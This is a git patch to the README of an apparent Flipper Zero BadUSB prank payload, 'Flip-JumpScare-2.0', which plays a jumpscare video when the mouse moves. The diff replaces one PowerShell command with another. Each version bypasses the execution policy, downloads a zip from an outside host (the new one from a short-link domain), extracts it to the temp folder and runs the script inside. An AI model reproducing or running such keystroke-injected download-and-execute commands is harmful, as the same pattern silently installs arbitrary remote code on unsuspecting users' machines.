From 0a36c7672e3561239f55f318391c0f3f41c91024 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 16:39:54 -0600 Subject: [PATCH] Update ReadMe.md --- Payloads/Flip-JumpScare-2.0/ReadMe.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-JumpScare-2.0/ReadMe.md b/Payloads/Flip-JumpScare-2.0/ReadMe.md index 03f3822..cdc451c 100644 --- a/Payloads/Flip-JumpScare-2.0/ReadMe.md +++ b/Payloads/Flip-JumpScare-2.0/ReadMe.md @@ -47,7 +47,7 @@ When a mouse movement is detected that video will be played in the powershell co * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload ``` -powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" +powershell -noexit -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" ```

(back to top)